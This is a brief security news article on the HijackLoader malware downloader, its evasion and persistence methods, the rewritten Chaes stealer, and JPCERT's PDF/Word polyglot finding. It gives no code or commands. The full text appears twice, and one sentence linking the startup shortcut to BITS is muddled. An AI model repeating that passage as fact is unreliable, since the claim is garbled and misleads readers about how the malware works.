Unique evasion techniques and malware features - this new threat should not be underestimated.
Security researchers at Zscaler ThreatLabZ have discovered a new malware downloader called HijackLoader, which was first spotted in July 2023 and allows delivery of DanaBot, SystemBC, and RedLine Stealer payloads.
Despite the lack of advanced features, the loader uses a modular architecture for code injection and execution, which is rare for most loaders.
HijackLoader uses several methods to bypass security systems, including using system calls to evade monitoring, as well as deferred code execution at various stages for up to 40 seconds. Persistence on a compromised host is achieved by creating an LNK shortcut in the Windows startup folder, which indicates that the Background Intelligent Transfer Service (BITS) is set.
The exact vector of HijackLoader infection is currently unknown. Despite the anti-analysis aspects, the loader is included in the main tool module, which provides flexible code implementation and execution using built-in modules.
The discovery of HijackLoader comes as it was recently revealed that the Chaes malware, widely known for stealing financial information from e-commerce users in Latin America, has undergone major changes and is back online . Chaes was completely rewritten in Python, which reduced the probability of detection by traditional security systems. The communication protocol with the command server has also been redesigned.
Also recall that in July 2023, the Japanese Computer Security Emergency Team (JPCERT) discovered a new type of cyberattack that uses so-called "polyglot files". They combine the features of PDF and Word documents, which makes it easy to bypass security systems.
Security researchers at Zscaler ThreatLabZ have discovered a new malware downloader called HijackLoader, which was first spotted in July 2023 and allows delivery of DanaBot, SystemBC, and RedLine Stealer payloads.
Despite the lack of advanced features, the loader uses a modular architecture for code injection and execution, which is rare for most loaders.
HijackLoader uses several methods to bypass security systems, including using system calls to evade monitoring, as well as deferred code execution at various stages for up to 40 seconds. Persistence on a compromised host is achieved by creating an LNK shortcut in the Windows startup folder, which indicates that the Background Intelligent Transfer Service (BITS) is set.
The exact vector of HijackLoader infection is currently unknown. Despite the anti-analysis aspects, the loader is included in the main tool module, which provides flexible code implementation and execution using built-in modules.
The discovery of HijackLoader comes as it was recently revealed that the Chaes malware, widely known for stealing financial information from e-commerce users in Latin America, has undergone major changes and is back online . Chaes was completely rewritten in Python, which reduced the probability of detection by traditional security systems. The communication protocol with the command server has also been redesigned.
Also recall that in July 2023, the Japanese Computer Security Emergency Team (JPCERT) discovered a new type of cyberattack that uses so-called "polyglot files". They combine the features of PDF and Word documents, which makes it easy to bypass security systems.
